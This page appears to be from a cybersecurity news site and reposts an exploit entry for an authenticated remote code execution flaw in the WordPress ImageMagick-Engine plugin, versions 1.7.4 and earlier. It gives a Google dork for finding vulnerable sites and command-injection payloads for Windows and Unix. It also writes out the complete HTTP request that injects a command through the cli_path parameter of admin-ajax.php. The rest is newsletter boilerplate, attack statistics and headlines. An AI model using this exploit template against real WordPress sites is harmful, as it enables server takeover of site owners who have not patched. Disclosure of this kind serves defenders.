A remote code execution (RCE) vulnerability was discovered in WordPress Plugin ImageMagick-Engine by Security Researcher ABDO10 affecting <= 1.7.4.
# Exploit Title: WordPress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/" # Date: Thursday, September 1, 2022 # Exploit Author: ABDO10 # Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/ # Software Link: https://github.com/orangelabweb/imagemagick-engine/ # Version: <= 1.7.4 # Tested on: windows 10 -- vulnerable section https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529 -- payload on windows: d&calc.exe&anything -- on unix : notify-send "done" -- exploit : GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload] HTTP/1.1 Host: localhost Cookie: wordpress_sec_xx=; wp-settings-time-1=; wordpress_test_cookie=; wordpress_logged_in_xx=somestuff User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine X-Requested-With: XMLHttpRequest Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close
Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for our Weekly Cybersecurity Newsletter Today.
Remember, CyberSecurity Starts With You!
- Globally, 30,000 websites are hacked daily.
- 64% of companies worldwide have experienced at least one form of a cyber attack.
- There were 20M breached records in March 2021.
- In 2020, ransomware cases grew by 150%.
- Email is responsible for around 94% of all malware.
- Every 39 seconds, there is a new attack somewhere on the web.
- An average of around 24,000 malicious mobile apps are blocked daily on the internet.
- Musk Confirms Twitter 2.0 will Bring End-to-End Encryption to Direct Messages - 28 November 2022
- UK bans Chinese CCTV cameras at ‘sensitive’ government locations - 26 November 2022
- Chrome Update: Exploited Zero-Day Vulnerability fixed by Google, the 8th this year - 25 November 2022